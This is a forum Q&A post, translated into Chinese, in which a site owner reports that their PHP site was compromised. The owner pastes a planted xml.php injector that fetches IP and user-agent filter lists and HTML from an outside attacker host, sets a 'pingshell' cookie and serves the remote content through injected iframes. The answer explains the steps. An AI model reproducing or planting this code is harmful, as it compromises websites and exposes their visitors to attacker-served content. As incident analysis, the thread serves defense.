编辑:到目前为止一切顺利。

我刚刚发现它已下载并在我的bash历史记录中运行:

http://notsoft.ru/glib

(可以安全查看)

谢谢大家

我刚刚注意到我网站的源php已被编辑。我不知道该怎么做(从那以后我更改了所有密码),但是真正令我困惑的是为什么。

在几页中放置了一个iframe,链接到放置在我的图像目录中的xml.php文件(这是HTACCESS可以访问的唯一目录。由于页面相当复杂并且必须自动放置,因此必须手动放置此代码不刹车这些页面几乎是不可能的。

现在真正使令人困惑的是该XML.php文件的内容,从我看到的内容来看,它什么也没做。

这是代码:

<?php

$urlIps = "http://mp3magicmag.com/frame/ips.txt"; // Url to IP's
$urlHtml = "http://mp3magicmag.com/frame/html.code"; // Url to html.code
$urlUa = "http://mp3magicmag.com/frame/ua.txt"; // Url to User Agent file

if(isset($_GET['ping'])){
    echo "Status: Ping successful!"; die;
}
$ip = $_SERVER['REMOTE_ADDR'];
//orezaem do deapozona
$exIps = explode(".", $ip);

$ip = $exIps[0].".".$exIps[1].".".$exIps[2];

$ips = file_get_contents($urlIps);

if(strpos(" ".$ips, $ip)){ // esli nashli IP v file to ostanavlivaem process..
    die;
}

$arrUa = file($urlUa);
for($ua=0; $ua<count($arrUa); $ua++){
    $userAgent = trim($arrUa[$ua]);
    if(strpos(" ".$_SERVER['HTTP_USER_AGENT'], $userAgent)){ // esli nashli v User Agent'e to ostanavlivaem process..
        die;
    }
}


if(isset($_COOKIE['pingshell'])){ // proveriaem est' li kuki

    echo @file_get_contents($urlHtml);

}else{

?>
<SCRIPT LANGUAGE="JavaScript">
function setCookie (name, value, expires, path, domain, secure) {
      document.cookie = name + "=" + escape(value) +
    ((expires) ? "; expires=" + expires : "") +
    ((path) ? "; path=" + path : "") +
    ((domain) ? "; domain=" + domain : "") +
    ((secure) ? "; secure" : "");
}
</SCRIPT>

<SCRIPT LANGUAGE="JavaScript">
setCookie("pingshell", "12345", "Mon, 01-Jan-2099 00:00:00 GMT", "/");
</SCRIPT>
<meta http-equiv="refresh" content="2; url=">

<?php
}
?>

我是否缺少某些东西,或者这是有史以来最奇怪的“骇客”吗?我已经完成了谷歌搜索,找不到之前发生的任何引用。

最佳答案

正确的操作如下。

  • 检查是否通过ping调用了脚本,如果脚本已答复并终止
  • 下载有效服务器IP的列表,并检查请求是否来自服务器,否则终止。
  • 下载用户代理字符串列表,并将浏览器与字符串匹配,以查看其是否有效,否则终止。
  • 如果先前已设置cookie pingshell,则HTML文件将下载并显示在浏览器中
  • 否则,将cookie脚本发送回浏览器,将pingshell cookie设置为对整个域有效的伪值。

  • 步骤4是重要的一点,它看起来像是代理服务器,用于在给定的位置检索HTML。如果链接不合法,那就不好了。不过,可能出于营销目的,他们可以使用您的URL来提供其内容并获取用户的点击数据。

    话虽如此,该代码仅允许从规定的IP地址进行任何形式的访问,因此,除非他们首先捕获该信息,否则似乎是针对特定人群的特定用途而设计的。

    09-10 11:42
    查看更多